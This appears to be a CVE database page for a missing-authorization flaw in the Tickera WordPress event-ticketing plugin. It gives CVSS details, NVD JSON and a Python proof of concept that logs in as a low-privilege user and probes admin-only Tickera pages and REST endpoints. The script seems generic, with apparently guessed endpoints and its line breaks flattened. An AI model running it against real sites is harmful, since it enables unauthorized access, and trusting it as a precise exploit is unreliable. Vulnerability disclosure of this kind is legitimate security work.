Security Vulnerability Report
中文
CVE-2025-69355 CVSS 4.3 MEDIUM

CVE-2025-69355

Published: 2026-01-06 17:15:48
Last Modified: 2026-04-27 19:16:42

Description

Missing Authorization vulnerability in Tickera Tickera tickera-event-ticketing-system allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Tickera: from n/a through <= 3.5.6.4.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Tickera Event Ticketing System <= 3.5.6.4 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-69355 PoC - Missing Authorization in Tickera Plugin # Target: WordPress site with Tickera plugin <= 3.5.6.4 def exploit_tickera_auth_bypass(target_url, username, password): """ Exploit Missing Authorization vulnerability in Tickera plugin. This PoC demonstrates accessing admin-only endpoints with low-privilege user. """ session = requests.Session() # Step 1: Login with low-privilege account login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } print("[*] Attempting login with low-privilege account...") response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed") return False print("[+] Login successful") # Step 2: Access admin-only Tickera endpoints (requires authorization bypass) admin_endpoints = [ '/wp-admin/admin.php?page=tc_tickets', '/wp-admin/admin.php?page=tc_orders', '/wp-json/tickera/v1/tickets', '/wp-json/tickera/v1/orders' ] print("[*] Attempting to access admin-only endpoints...") for endpoint in admin_endpoints: url = target_url + endpoint response = session.get(url) if response.status_code == 200 and 'tc_' in response.text: print(f"[+] Successfully accessed: {endpoint}") print(f" Response length: {len(response.text)} bytes") else: print(f"[-] Access denied or not vulnerable: {endpoint}") return True if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") print(f"Example: python {sys.argv[0]} http://example.com subscriber password123") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_tickera_auth_bypass(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69355", "sourceIdentifier": "[email protected]", "published": "2026-01-06T17:15:48.083", "lastModified": "2026-04-27T19:16:42.083", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Tickera Tickera tickera-event-ticketing-system allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Tickera: from n/a through <= 3.5.6.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/tickera-event-ticketing-system/vulnerability/wordpress-tickera-plugin-3-5-6-4-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}